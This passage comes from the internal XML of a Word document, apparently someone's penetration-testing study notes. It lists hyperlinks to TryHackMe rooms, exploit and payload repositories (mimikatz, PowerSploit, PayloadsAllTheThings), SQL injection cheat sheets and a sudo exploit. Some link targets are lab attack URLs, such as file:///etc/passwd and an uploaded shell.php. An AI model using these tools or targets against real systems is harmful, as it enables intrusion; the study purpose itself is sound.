      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="660355265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="736052140">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="742339278">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="745079402">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="850802339">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="895240270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="938561296">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="952440779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1064060750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1183008559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1203589107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1029642257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1251542105">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1255475107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1342046421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1398825532">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1479761371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1508322392">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1584870788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1600792107">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1731613840">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1821730609">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1994989031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2034761956">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2076973282">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2087726861">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="209944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yberciti.biz/faq/understanding-etcpasswd-file-format/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/owasptop10" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kirsle.net/wizards/flask-session.cgi" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vineethbharadwaj.medium.com/cve-2021-41773-42013-thm-write-up-task-4-8af1832236a5" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://report-uri.com/home/generate" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://routersecurity.org/hnap.php" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="url:port/v2/_catalog" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.google.com/adsense/answer/105516?hl=en" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.csimn.com/CSI_pages/Modbus101.html" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://5ysk3y.github.io/thm/guides/gamezone/" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://website.thm.attackers-domain.thm" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fuzzysecurity.com/tutorials/16.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.109.106/api/site-log.php?date=FUZZ" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Input_Validation_Cheat_Sheet.md" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///etc/passwd" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdnjs.com/libraries/jquery" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://report-uri.com/home/hash" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://repairshop.sbrc" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/p/Horshark" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:atena@10.10.111.8" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/easypeasyctf" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/sqli" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///etc/passwd" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.PNG"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://charlesreid1.com/wiki/Metasploitable/Apache/Tomcat_and_Coyote" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.varonis.com/blog/kerberos-authentication-explained/" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.npmjs.com/package/helmet-csp" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sonicvisualiser.org/download.html" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="url:port/v2/repo/name/tags/list" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bellingcat.com/resources/how-tos/2015/07/23/unveiling-hidden-connections-with-google-analytics-ids/" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@aniyazov2500/tryhackme-gamezone-1a5b13fbdf2a" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\icmp" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.45.228/?proxy=http%3A%2F%2Flist.hohoho.localtest.me" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/user1/note.txt" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/FUZZ" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.uploadvulns.thm" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm.git" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://repairshop.sbrc" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/horshark/akb-explorer" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/rpwebscanning" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/easyctf" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jinja.palletsprojects.com/en/2.11.x/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/uopeasy" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulnerable/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/getappInfo" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blasty/CVE-2021-3156" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/Overlay_filesystem" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://report-uri.com/home/hash" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernullius.free.beeceptor.com" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/7/capabilities" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/firmadyne/firmadyne" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/tags/list" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nixintel.info/osint/website-osint-whats-the-link-between-antifa-com-and-russia/" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/dns/dns-records/" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/SQL.txt" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/XiphosResearch/exploits/tree/master/Joomblah" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/411Hall/JAWS" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wpscanteam/wpscan" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\icmp" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP/customers/login%20-fc%20200" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.codecademy.com/articles/sql-commands" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sqlinjection.net/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/FUZZ" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.uploadvulns.thm/uploads/shell.php" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.JPG"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jinja.palletsprojects.com/en/2.11.x/api/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/epinna/tplmap" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forced_browsing" TargetMode="External"/><Relationship Id="rId167" 